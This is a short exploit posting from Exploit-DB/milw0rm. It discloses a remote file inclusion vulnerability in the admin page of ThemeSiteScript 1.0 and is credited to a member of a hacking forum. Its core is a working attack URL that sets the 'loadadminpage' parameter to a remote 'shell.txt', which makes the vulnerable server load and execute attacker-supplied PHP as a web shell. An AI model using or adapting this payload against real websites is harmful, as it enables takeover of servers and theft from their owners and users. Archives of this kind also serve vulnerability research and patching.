ThemeSiteScript 1.0 - 'index.php?loadadminpage' Remote File Inclusion

EDB-ID:

4780

CVE:

N/A


Author:

Koller

Type:

webapps


Platform:

PHP

Date:

2007-12-24


#    .__                                          __.   
#    NN)    NNNN   JNNN` NNNN.   NNN NNNNNNNNNNN  NN)   
#    NN)    `NNN).NNNF  .NNNNN  (NN) """4NNN"""`  NN)   
#    NN)     (NNNNNN`   (NNNNN) NNN     (NNN      NN)   
#    NN)      4NNNN`    NNN(NNN.NNF     NNN)      NN)   
#    NN)     JNNNNL    (NN) NNNNNN)    (NNN       NN)   
#    NN)    JNNNNNN)   JNN` `NNNNN     JNNF       NN)   
#    NN)  .NNNF (NNN.  NNN   4NNN)     NNN)       NN)   
#    NN) JNNN`   NNNN (NN)    NNN`    (NNN        NN)   
#    NN)                                          NN)  
#    .__           http://xaker.name              __.
#
#
# script name      : ThemeSiteScript 1.0
# GoogLe Dork      : none
# Of. site         : http://agaresmedia.com
# The price        : $32.99
# Risk             : Medium
# Found By         : Koller
# Thanks           : all members xaker.name & grabberz.com
# Vulnerable files : /admin/index.php

# Vuln : www.victim.com/admin/index.php?loadadminpage=http://localhost/shell.txt?

# Contact: K0ller (at) hotmail (dot) CoM

# milw0rm.com [2007-12-24]